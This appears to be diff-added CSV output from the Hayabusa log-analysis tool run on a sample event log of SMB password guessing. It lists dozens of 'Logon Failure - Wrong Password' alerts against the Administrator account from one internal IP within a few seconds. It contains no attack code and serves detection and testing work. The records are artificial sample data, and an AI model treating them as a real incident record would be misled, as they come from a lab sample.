+2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qjPyJXl984vViV6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MomQ8Yt51VsMiO4p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LJYCi5r2otMHxA8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4oUSkMBI8SGDLwYC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j1x3lyRjxn73KITB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gh05BhGpwq1ho62a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bxj6ITbiciyRNLbF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uev2mjCaqHjm6NYi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L4WU383o9E5JyM5V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lfMv0lsoiRnTCFXe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XL4ahBqUyGeTONkE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8hJ888Kmyi6KqIPn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VZ6sfYMHuygnMdY2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XkuSlyTNc5OOoUtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Z13YmupcMato8Sd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JedeMnLPnRJEwhZ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmy0c0wFheIRzSo4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sskKdqku5S0f1sWm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 15Qg0nCXNj7Ub1Sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZD6iuaqv70k69G87  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gk3UuqTJmvH1snmN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zaw9iF5mJlyygdnB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Sr5PZAd1qMc7hi3c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l5xbQtyueVq3fJSG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g2nP0zz2ofBxTGw6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SYJheREJmEwj0791  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: exglD9fnLwaqwRZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8bSAU1QjasDAsmry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cfnrtXR7evQBbaOw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KYAwjW99chcntPsQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rG2PYfOTfT7QvbPu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FojDtfDNXq0gQfYu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SUTT0QycbFtyJfNL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gcbv1lrcYdT9Wuli  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pjdFfvCCfGXo7FUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rzqGdWlGglLQx6Z4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3Rt80PMk70sVqbk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: okunzcEHnxUml4SG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qH0AY3DeIryuHSiN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DjqtxY5Fly4qAusS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PXHYu7wAqo7m6mZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UaEM3boErBRrCbna  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nSzwstH2imPjwah  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Z6NM0I4vRTXlLKu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jYhjN3f8KlFIEUKy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qWicYt2HXLDgc3kc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uz7yqqxdMrsM2L1g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wqKTguT2Z3OPCxGR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ywpwCM4u6nFSq9oS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k1t5ZBw3HOxux65e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MtLFQSltjjOjdl2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AyFD3cjef0NUMZZ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uDYECnF1YTKRKA3K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfqxcIVpX9BbsPIM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mjL5hvyYesMfDISw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3bh8c5ohv55SAX26  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MflfcFDnGU3xUOmz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aX0wfTs5FzCdwGrR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9gdU6faDjEH5wW2X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 507PC8xD6l0TbhG3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrWgYcf9EuXt4MHS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GvIGEw3fdX9cDzIV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9X1q0dT5irWa44Rz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpgAkElSQjVo53z2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nxUEwRMaiAhiIXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vIoaysmFNfEerv8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aHLhFgL0xfnrAIoF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YGK96B1hDPMK9YKh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yhDnNRDnAwctVtgQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zzO7RKaBPpg549A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zDgDGO3IKiLoIQ5D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aaYeBTUEudC3446  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
